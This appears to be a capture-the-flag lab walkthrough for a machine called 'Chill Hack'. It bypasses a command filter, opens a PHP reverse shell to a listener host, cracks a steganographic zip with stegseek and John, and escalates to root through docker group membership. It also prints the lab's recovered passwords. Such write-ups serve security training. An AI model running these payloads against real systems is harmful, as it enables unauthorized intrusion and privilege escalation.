Chill the Hack out of the Machine.

i) SCANNING

Let's start from NMAP scan:

nmap -A <IP>

Start from FTP. Do anonymous login.

There is a note. we got 2 users names — apaar and anurodh.

Next, HTTP port.

It's sports page and there is nothing useful. Let's run Gobuster.

There is nothing useful, expect /secret

There's a text field where we can enter a command to execute.

Its restricting command. So, we need alternative of very commands.

ls — echo *

cd — builtin cd

cat — tac

there is a .php file here.

tac index.php

And check source code, there is list of commands, that are blacklisted.

But there is a way, we can use / between command to bypass this filtering.

On, your terminal run Netcat listener.

And execute this command:

p\hp -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Got reverse shell.

Go to /var/www/files, there is unique named file. cat it.

This is hinting towards contents in images directory.

Send both to your machine by python server.

python3 -m http.server 8000

In your machine:

wget http://10.10.10.10:8000/002d7e638fb463fb7a266f5ffc7ac47d.gif
wget http://10.10.10.10:8000/hacker-with-laptop_23-2147985341.jpg

While using steghide, both asking for passphase. Use stegseek to brute it.

Nothing found in .gif but in .jpg, it extracted in .zip file. While unzipping it, asking for password.

Use John to crack the password.

zip2john hacker-with-laptop_23-2147985341.jpg.out > img.hash
john img.hash --wordlist=/usr/share/wordlists/rockyou.txt

Got password — pass1word

Now unzip that file.

And here we got base64 string.

decrypt it.

!d0ntKn0wmYp@ssw0rd

Let's try to log in via SSH using this password.

It's a part of docker group.

run this command:

docker run -v /:/mnt — rm -it alpine chroot /mnt /bin/sh

user flag — /home/apaar/local.txt

root flag — /root/proof.txt

LAB SOLVED.